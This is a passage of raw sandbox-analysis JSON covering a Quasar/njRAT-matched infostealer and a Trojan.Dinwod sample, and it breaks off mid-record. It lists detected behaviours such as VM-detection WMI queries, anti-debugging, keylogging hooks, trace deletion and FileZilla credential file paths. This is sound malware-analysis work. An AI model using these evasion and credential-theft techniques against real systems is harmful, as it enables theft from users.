binary/memory\n Matched sigs: Found potential IP address in binary/memory\n Matched sigs: Possibly tries to communicate over SSL connection (HTTPS)", "origin": "Indicator Combinations", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-408", "type": 2, "relevance": 1, "name": "Contains ability to delete files", "description": "Observed string: \"\"del /a /q /f \"\" (Indicator: \"\"del \") in Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \"\\Device\\HarddiskVolume2\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\" (Indicator: \"\\Device\\\"; Source: \"00000000-00000464.00000000.73933.001E0000.00000004.mdmp\")\n Found string \"\\Device\\HarddiskVolume2\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\" (Indicator: \"\\Device\\\"; Source: \"00000000-00005644.00000000.66191.00220000.00000004.mdmp, 00000000-00005644.00000001.68117.00220000.00000004.mdmp, 00000000-00005644.00000002.70037.00220000.00000004.mdmp, 00000000-00005644.00000003.73672.00220000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-406", "type": 2, "relevance": 1, "name": "Contains ability to shutdown system", "description": "Observed string: \"shutdown\" (Indicator: \"shutdown\") in Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2", "origin": "File/Memory", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-77", "type": 2, "relevance": 1, "name": "Contains ability to modify access token privileges (API string)", "description": "Found reference to API \"SeDebugPrivilege=\" (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00005644.00000001.68117.00220000.00000004.mdmp, 00000000-00005644.00000002.70037.00220000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Remote Access Related", "identifier": "string-531", "type": 2, "relevance": 1, "name": "Contains references to RPC protocol sequence strings", "description": "Found string \"ncacn_np\" (Indicator: \"ncacn_np\"; Source: \"00000000-00005644.00000003.73672.00220000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Pattern Matching", "identifier": "yara-112", "type": 13, "relevance": 3, "name": "YARA signature match - MD5 algorithm", "description": "YARA signature for MD5 algorithm matched on file \"sample.bin\"\n YARA signature for MD5 algorithm matched on file \"Client.exe.2079776608\"", "origin": "YARA Signature", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"DeleteDC\" (Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2, API is part of module: GDI32.DLL)\n Found string \"CryptHashData\" (Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2, API is part of module: CRYPTSP.DLL)\n Found string \"GetCurrentThreadId\" (Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2, API is part of module: KERNELBASE.DLL)\n Found string \"GetWindowThreadProcessId\" (Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2, API is part of module: USER32.DLL)\n Found string \"shutdown\" (Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2, API is part of module: WS2_32.DLL)\n Found string \"Escape\" (Source: 60001f9-_~_, API is part of module: GDI32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"Client.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- [targetUID: 00000000-00005644]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" at 00000000-00005644-00000105-5768364", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "api-1", "type": 6, "relevance": 10, "name": "Creates guarded memory regions (anti-debugging trick to avoid memory dumping)", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" is allocating memory with PAGE_GUARD access rights (Handle: 4294967295); (PID: 5644)", "origin": "API Call", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-24", "type": 6, "relevance": 10, "name": "Tries to sleep for a long time (more than two minutes)", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" sleeping for \"1566804069\" milliseconds", "origin": "API Call", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "string-55", "type": 2, "relevance": 10, "name": "Found a reference to a WMI query string known to be used for VM detection", "description": "\"SELECT Caption FROM Win32_OperatingSystem\" (Indicator: \" win32_operatingsystem\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n \"SELECT * FROM Win32_BIOS\" (Indicator: \" win32_bios\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n \"SELECT * FROM Win32_BaseBoard\" (Indicator: \" win32_baseboard\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n \"SELECT * FROM Win32_Processor\" (Indicator: \" win32_process\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n \"Select * From Win32_ComputerSystem\" (Indicator: \" win32_computersystem\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")\n \"SELECT * FROM Win32_OperatingSystem WHERE Primary='true'\" (Indicator: \" win32_operatingsystem\"; File: \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\")", "origin": "File/Memory", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "stream-86", "type": 1, "relevance": 4, "name": "Contains ability to retrieve information about the current system", "description": "䄤᯺☪撘맯賈爐Љ豿둺탛晸팵怟ᩋ❚ඵ໺䩧::딄ཤ렠ι聜ꆺ敏첒森폦№ᅥ㒆潁ⵢ鯡颻⩨뷓(׸涗댼뗎왍쎅㪂땲蠨삺垢碫恷䛴裕忚똗⇠㐺,Quasar.Common.Messages.GetSystemInfo) at 3c967ba67c97bd75f817c034d7c5180a-60001d2-_~Execute\n Quasar.Common.Messages.GetSystemInfoResponse::set_SystemInfos(System.Collections.Generic.List`1<System.Tuple`2<System.String,System.String>>) at 3c967ba67c97bd75f817c034d7c5180a-60001d3-_~_", "origin": "Hybrid Analysis Technology", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "stream-33", "type": 1, "relevance": 5, "name": "Contains ability to listen for incoming connections", "description": "Gma.System.MouseKeyHook.Implementation.EventFacade::GetKeyListener() at 3c967ba67c97bd75f817c034d7c5180a-60009be-EventFacade~remove_KeyUp\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3c967ba67c97bd75f817c034d7c5180a-60009c0-EventFacade~remove_MouseMove\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3c967ba67c97bd75f817c034d7c5180a-60009cf-EventFacade~add_MouseWheelExt\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3c967ba67c97bd75f817c034d7c5180a-60009ca-EventFacade~remove_MouseUp\n Gma.System.MouseKeyHook.Implementation.KeyListener::GetDownUpEventArgs(Gma.System.MouseKeyHook.WinApi.CallbackData) at 3c967ba67c97bd75f817c034d7c5180a-6000a34-KeyListener~Callback\n Gma.System.MouseKeyHook.Implementation.MouseListener::GetEventArgs(Gma.System.MouseKeyHook.WinApi.CallbackData) at 3c967ba67c97bd75f817c034d7c5180a-6000a12-MouseListener~Callback\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetKeyListener() at 3c967ba67c97bd75f817c034d7c5180a-60009bb-EventFacade~add_KeyPress\n Gma.System.MouseKeyHook.Implementation.BaseListener::set_Handle(Gma.System.MouseKeyHook.WinApi.HookResult) at 3c967ba67c97bd75f817c034d7c5180a-60009a3-ctor\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3c967ba67c97bd75f817c034d7c5180a-60009d6-EventFacade~remove_MouseDragStartedExt\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3c967ba67c97bd75f817c034d7c5180a-60009c8-EventFacade~remove_MouseDownExt\n Gma.System.MouseKeyHook.Implementation.BaseListener::Dispose() at 3c967ba67c97bd75f817c034d7c5180a-60009db-EventFacade~Dispose\n Gma.System.MouseKeyHook.Implementation.MouseListener::.ctor(Gma.System.MouseKeyHook.Implementation.Subscribe) at 3c967ba67c97bd75f817c034d7c5180a-60009af-ctor\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3c967ba67c97bd75f817c034d7c5180a-60009d1-EventFacade~add_MouseDoubleClick\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3c967ba67c97bd75f817c034d7c5180a-60009c5-EventFacade~add_MouseDown\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3c967ba67c97bd75f817c034d7c5180a-60009d9-EventFacade~add_MouseDragFinishedExt\n Gma.System.MouseKeyHook.Implementation.EventFacade::CreateMouseListener() at 3c967ba67c97bd75f817c034d7c5180a-60009dd-EventFacade~GetMouseListener\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3c967ba67c97bd75f817c034d7c5180a-60009c2-EventFacade~remove_MouseMoveExt\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3c967ba67c97bd75f817c034d7c5180a-60009cb-EventFacade~add_MouseUpExt\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetKeyListener() at 3c967ba67c97bd75f817c034d7c5180a-60009b9-EventFacade~add_KeyDown\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3c967ba67c97bd75f817c034d7c5180a-60009d7-EventFacade~add_MouseDragFinished\n Gma.System.MouseKeyHook.Implementation.BaseListener::.ctor(Gma.System.MouseKeyHook.Implementation.Subscribe) at 3c967ba67c97bd75f817c034d7c5180a-60009f5-ctor\n Gma.System.MouseKeyHook.Implementation.BaseListener::.ctor(Gma.System.MouseKeyHook.Implementation.Subscribe) at 3c967ba67c97bd75f817c034d7c5180a-6000a2a-ctor\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3c967ba67c97bd75f817c034d7c5180a-60009c7-EventFacade~add_MouseDownExt\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetKeyListener() at 3c967ba67c97bd75f817c034d7c5180a-60009bc-EventFacade~remove_KeyPress\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3c967ba67c97bd75f817c034d7c5180a-60009d2-EventFacade~remove_MouseDoubleClick", "origin": "Hybrid Analysis Technology", "attck_id": "T1040", "attck_id_wiki": "https://attack.mitre.org/techniques/T1040"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "stream-85", "type": 1, "relevance": 5, "name": "Contains ability to open a port and listen for incoming connection", "description": "Gma.System.MouseKeyHook.Implementation.EventFacade::GetKeyListener() at 3c967ba67c97bd75f817c034d7c5180a-60009be-EventFacade~remove_KeyUp\n Org.BouncyCastle.Tls.TlsUtilities::CalculatePskBinder(Org.BouncyCastle.Tls.Crypto.TlsCrypto,System.Boolean,System.Int32,Org.BouncyCastle.Tls.Crypto.TlsSecret,System.Byte[]) at 3c967ba67c97bd75f817c034d7c5180a-6001493-OfferedPsks~EncodeBinders\n System.Type::GetMethods(System.Reflection.BindingFlags) at 3c967ba67c97bd75f817c034d7c5180a-60005f0-SurrogateSerializer~HasCast\n System.Type::GetProperty(System.String,System.Reflection.BindingFlags) at 3c967ba67c97bd75f817c034d7c5180a-6000366-Helpers~GetProperty\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3c967ba67c97bd75f817c034d7c5180a-60009c0-EventFacade~remove_MouseMove\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3c967ba67c97bd75f817c034d7c5180a-60009cf-EventFacade~add_MouseWheelExt\n Org.BouncyCastle.Tls.TlsUtilities::AddPreSharedKeyToClientHelloRetry(Org.BouncyCastle.Tls.TlsClientContext,Org.BouncyCastle.Tls.OfferedPsks/BindersConfig,System.Collections.IDictionary) at 3c967ba67c97bd75f817c034d7c5180a-60015ee-TlsClientProtocol~Send13ClientHelloRetry\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3c967ba67c97bd75f817c034d7c5180a-60009ca-EventFacade~remove_MouseUp\n Gma.System.MouseKeyHook.Implementation.KeyListener::GetDownUpEventArgs(Gma.System.MouseKeyHook.WinApi.CallbackData) at 3c967ba67c97bd75f817c034d7c5180a-6000a34-KeyListener~Callback\n System.Net.Sockets.Socket::get_OSSupportsIPv6() at 3c967ba67c97bd75f817c034d7c5180a-6000c87-_~_\n Gma.System.MouseKeyHook.Implementation.MouseListener::GetEventArgs(Gma.System.MouseKeyHook.WinApi.CallbackData) at 3c967ba67c97bd75f817c034d7c5180a-6000a12-MouseListener~Callback\n 䗳頻꓎⴬泌鞸썿븠䈎�ጤ�弙㩘❻ꃤ配額::SetKeepAliveEx(System.Net.Sockets.Socket,System.UInt32,System.UInt32) at 3c967ba67c97bd75f817c034d7c5180a-6000140-_~_\n System.Type::GetMethod(System.String,System.Reflection.BindingFlags,System.Reflection.Binder,System.Type[],System.Reflection.ParameterModifier[]) at 3c967ba67c97bd75f817c034d7c5180a-6000359-Helpers~GetStaticMethod\n Org.BouncyCastle.Tls.OfferedPsks::get_Binders() at 3c967ba67c97bd75f817c034d7c5180a-6001983-TlsUtilities~SelectPreSharedKey\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetKeyListener() at 3c967ba67c97bd75f817c034d7c5180a-60009bb-EventFacade~add_KeyPress\n Gma.System.MouseKeyHook.Implementation.BaseListener::set_Handle(Gma.System.MouseKeyHook.WinApi.HookResult) at 3c967ba67c97bd75f817c034d7c5180a-60009a3-ctor\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3c967ba67c97bd75f817c034d7c5180a-60009d6-EventFacade~remove_MouseDragStartedExt\n System.Type::GetProperties(System.Reflection.BindingFlags) at 3c967ba67c97bd75f817c034d7c5180a-6000368-Helpers~GetInstanceFieldsAndProperties\n System.Type::GetMethod(System.String,System.Reflection.BindingFlags) at 3c967ba67c97bd75f817c034d7c5180a-6000863-CompilerContext~EmitWrite\n Org.BouncyCastle.Crypto.Tls.TlsUtilities::IsTimeout(System.Net.Sockets.SocketException) at 3c967ba67c97bd75f817c034d7c5180a-6002ff2-DtlsTransport~Receive\n System.Type::GetConstructor(System.Reflection.BindingFlags,System.Reflection.Binder,System.Type[],System.Reflection.ParameterModifier[]) at 3c967ba67c97bd75f817c034d7c5180a-6000364-Helpers~GetConstructor\n Gma.System.MouseKeyHook.Implementation.EventFacade::GetMouseListener() at 3c967ba67c97bd75f817c034d7c5180a-60009c8-EventFacade~remove_MouseDownExt\n Gma.System.MouseKeyHook.Implementation.BaseListener::Dispose() at 3c967ba67c97bd75f817c034d7c5180a-60009db-EventFacade~Dispose\n Gma.System.MouseKeyHook.Implementation.MouseListener::.ctor(Gma.System.MouseKeyHook.Implementation.Subscribe) at 3c967ba67c97bd75f817c034d7c5180a-60009af-ctor\n System.Type::GetMethod(System.String,System.Reflection.BindingFlags,System.Reflection.Binder,System.Type[],System.Reflection.ParameterModifier[]) at 3c967ba67c97bd75f817c034d7c5180a-6000508-DefaultValueDecorator~EmitBeq", "origin": "Hybrid Analysis Technology", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "api-28", "type": 6, "relevance": 3, "name": "Adjusts debug privileges", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" adjusted SE_DEBUG_PRIVILEGE on file \"C:\\Windows\\System32\\cryptsp.dll\"", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" opened \"C:\\70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe:Zone.Identifier\" with delete access\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\SubDir\\Client.exe:Zone.Identifier\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Pattern Matching", "identifier": "yara-0", "type": 13, "relevance": 9, "name": "YARA signature match", "description": "YARA signature \"win_njrat_g0\" matched file \"sample.bin\" (Author: Various authors / Slavo Greminger, SWITCH-CERT)\n YARA signature \"win_njrat_g0\" matched file \"Client.exe.2079776608\" (Author: Various authors / Slavo Greminger, SWITCH-CERT)\n YARA signature \"MALWARE_Win_QuasarStealer\" matched file \"sample.bin\" as \"Detects Quasar infostealer\" (Author: ditekshen)\n YARA signature \"MALWARE_Win_QuasarStealer\" matched file \"Client.exe.2079776608\" as \"Detects Quasar infostealer\" (Author: ditekshen)", "origin": "YARA Signature"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\SubDir\\Client.exe\" (Handle: 616)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\SubDir\\Client.exe\" (Handle: 616)\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\SubDir\\Client.exe\" (Handle: 616)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-42", "type": 6, "relevance": 7, "name": "Tries to hide tracks of having downloaded a file from the internet", "description": "\"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" opened \"C:\\70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe:Zone.Identifier\" with delete access\n \"70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\SubDir\\Client.exe:Zone.Identifier\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "string-11", "type": 2, "relevance": 6, "name": "Found FTP credentials location strings", "description": "\"{0}\\FileZilla\\recentservers.xml\" (Indicator: \"recentservers.xml\") in Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\n \"{0}\\FileZilla\\sitemanager.xml\" (Indicator: \"sitemanager.xml\") in Source: 70bceb4e3e62015b87de30e1063f0dd64c2d43255211845d64ef508d05e17ff2\n \"{0}\\\\FileZilla\\\\recentservers.xml\" (Indicator: \"recentservers.xml\") in Source: 600007d-ctor\n \"{0}\\\\FileZilla\\\\sitemanager.xml\" (Indicator: \"sitemanager.xml\") in Source: 600007d-ctor", "origin": "File/Memory", "attck_id": "T1552.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "string-56", "type": 2, "relevance": 6, "name": "Found a reference to an external IP address lookup service", "description": "\"https://api.ipify.org/\" (Indicator: \"api.ipify.org\"; File: \"6000217-_~_\")", "origin": "File/Memory", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9
https://hybrid-analysis.com/sample/dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9
Hybrid Analysis - Infostealers
{"size": 342281, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "submit_name": "dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9", "sha256": "dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9", "av_detect": 96, "vx_family": "Trojan.Dinwod", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "The operation completed successfully. (0x0)", "total_processes": 64, "total_signatures": 99, "extracted_files": [{"name": "00022.exe", "file_path": "C:\\00022.exe", "file_size": 342742, "sha256": "9b352fbf192bc1c5f8baca5d5d51ffc04a0f05658ee6058a3b0f4ecbb643629c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "00022.exe (PID: 3336)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "00666.exe", "file_path": "C:\\00666.exe", "file_size": 342550, "sha256": "8d238af36de4e6ced0155641ff2e6ae027c95099a1f93b17a44566045fc03f48", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hxfhrx.exe (PID: 2404)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0204422.exe", "file_path": "C:\\0204422.exe", "file_size": 342723, "sha256": "bab6a28c0438e97133bb8247b8859382412bc209287a784b2dd96f8c75001a28", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0204422.exe (PID: 3172)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "04040.exe", "file_path": "C:\\04040.exe", "file_size": 342584, "sha256": "96733a2a2af18fb5b7ae444bd566930021258096a7cea2825e7fe4a35ff99d32", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6666266.exe (PID: 4252)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "04048.exe", "file_path": "C:\\04048.exe", "file_size": 342876, "sha256": "82d26c888441d60ae951e396f146cb38e172f6b0b54fff1aaed7bb6f67c5bcbb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "04048.exe (PID: 3692)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0642260.exe", "file_path": "C:\\0642260.exe", "file_size": 343201, "sha256": "0330ebf7d49da5978c42cb2886a642249749fb0e4f99c758da9fabcca0acd586", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8402600.exe (PID: 1348)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "204084.exe", "file_path": "C:\\204084.exe", "file_size": 342827, "sha256": "5180c9531c33f5754810d1fd0de6ae11b19db43308e92ce823651eb97311a60e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "240286.exe (PID: 3280)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "240286.exe", "file_path": "C:\\240286.exe", "file_size": 342809, "sha256": "c9592dabf26b3540168ecb39637b366ddf3e7367c79aa7e817f2f84bec8279e2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "240286.exe (PID: 3280)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "24640.exe", "file_path": "C:\\24640.exe", "file_size": 342839, "sha256": "7a7bfde51ea5c708cc3e1b853e2c5d64e3887117e6d1d6b37c62bba23681e45a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "204084.exe (PID: 1372)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4066668.exe", "file_path": "C:\\4066668.exe", "file_size": 342752, "sha256": "7109fe0b8e0b54d0c5e7f99a650c503e0a73cc2eb361ed108fb2d9f259eab6a7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4066668.exe (PID: 1896)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "420260.exe", "file_path": "C:\\420260.exe", "file_size": 342333, "sha256": "7e34eeece784db84503757bdf81ded19e8666bcc3dad90cd1b8b98ba86560712", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "420260.exe (PID: 5636)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "466844.exe", "file_path": "C:\\466844.exe", "file_size": 342315, "sha256": "c1253d92b9e6e6432ed7b9900426ee9cee002e91091752d8ca78159d8b887e11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "80824.exe (PID: 6128)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "48628.exe", "file_path": "C:\\48628.exe", "file_size": 342764, "sha256": "1f8a11d0cd4e8ef5acbb43e8646ba0d68aa300bc2c22a9d350721507fdd1532b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "48628.exe (PID: 2744)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "60024.exe", "file_path": "C:\\60024.exe", "file_size": 343220, "sha256": "8c4650c80820ec21bf05b1ba0b106f4283e92c4acd41ca467c6cb976d4568374", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "60024.exe (PID: 1356)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6040224.exe", "file_path": "C:\\6040224.exe", "file_size": 342890, "sha256": "f60d7554517df13d42595e122c915641f0774b20caccf3384462c7a8b5a4d21e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6040224.exe (PID: 3688)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "66608.exe", "file_path": "C:\\66608.exe", "file_size": 342865, "sha256": "ba81db30db6608ef1de5facc58b7c214fb2fb796ffb18a8d4ea10c3422abdcf8", "type_tags": ["peexe", "executable"], 